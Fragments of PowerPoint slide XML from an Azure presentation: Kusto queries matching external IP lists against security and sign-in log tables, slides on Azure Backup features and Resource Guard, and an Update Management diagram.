              <a:t>SecurityEvent</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where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IpAddress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in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extend Ip =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IpAddress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User =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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VMConnection</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where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SourceIp</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in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extend Ip =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SourceIp</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where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LinksLive</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1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SigninLogs</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where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IPAddress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in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extend Ip =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IPAddress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User =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UserPrincipalName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9" name="Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE67705F-1997-4E19-83C6-1847A801BD06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484837" y="1099803"/>
            <a:ext cx="1856703" cy="563897"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>External Sources</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"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E8D04A6D-4232-441D-8734-A4F2075F5148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503887" y="2369803"/>
            <a:ext cx="1856703" cy="563897"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Regex Magic</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"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BEBC9728-4F41-43F8-BC28-313C905B874F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529287" y="3220703"/>
            <a:ext cx="1856703" cy="563897"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Map it against table SecurityEvent</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"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12" name="Rectangle: Rounded Corners 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBB80A-BC4D-48D4-AAF0-F6789F15E208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554687" y="4230353"/>
            <a:ext cx="1856703" cy="563897"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Map it against table VMConnection</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"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D0BBE1AF-B374-43A8-A74E-94029DB3ED1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580087" y="5233653"/>
            <a:ext cx="1856703" cy="563897"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Map it against table SignInLogs</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="16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7845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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Backup</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="4000" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886540E3-E73A-41AD-B62B-2A9776449669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742339"/>
            <a:ext cx="4493230" cy="5750935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AAE823-892B-40D1-B71F-9CEB8A97E79D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530390" y="477644"/>
            <a:ext cx="4102437" cy="5355853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>Azure Backup for virtual machines </a:t>
            </a:r>
            <a:br>
              <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nb-NO" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Also adding support for multiple backup points yeah day (Enhanced Policy)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="15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rPr>
              <a:t>Now support for Archive Tier for backup (monthly and yearly)</a:t>
            </a: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rPr>
              <a:t>Resource Guard </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>– Ensure that backup admin cannot delete backup data</a:t>
            </a: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rPr>
              <a:t>Are also some third party alternatives</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Example: Veeam Azure for VM</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Example: Velero/Kasten for AKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="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None/>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01DEE46-884D-46BD-B26F-73C92C72B323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2683995" y="6232580"/>
            <a:ext cx="860950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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kontakt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>tilgang</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="14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1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>til</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> preview </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="1"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en-US" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>askazurebackupteam@microsoft.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Multi-user authorization using Resource Guard - Azure Backup | Microsoft  Docs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B11C33D-C603-4B48-AB36-FC13C3B8D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3885" y="1287378"/>
            <a:ext cx="6225840" cy="3437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8648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B2028C6-8E03-4563-9210-A45DDA60BB7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8197850" y="1130299"/>
            <a:ext cx="3067050" cy="1289051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B39"/>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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>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9015C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Update Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B32D8B-C9FF-4CD1-BE20-C143D2218E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145944" y="1259141"/>
            <a:ext cx="1000125" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Rounded Corners 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1FA410-64D2-43D1-833E-F5FF2D55B8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9887222" y="3144772"/>
            <a:ext cx="1856703" cy="940603"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Automation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle: Rounded Corners 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1FA9D0-EC3B-4E1E-B476-DCF991976078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6661422" y="3151122"/>
            <a:ext cx="1856703" cy="940603"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Log Analytics Workspace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Arrow: Down 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC4B503-CAFB-4689-8367-E0530FA07AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8915400" y="2930525"/>
            <a:ext cx="546100" cy="1308100"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>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84D6ED11-A228-4228-B55B-7BE943D104B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504237" y="1316037"/>
            <a:ext cx="390525" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D99BF9E6-1F6C-487F-BFFE-C4012519BABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10606087" y="1322387"/>
            <a:ext cx="390525" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Cylinder 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B022C8C3-8BC6-414A-9726-8FD7C8AF5E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164058" y="1539350"/>
            <a:ext cx="1367808" cy="789410"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0A1B39"/>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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
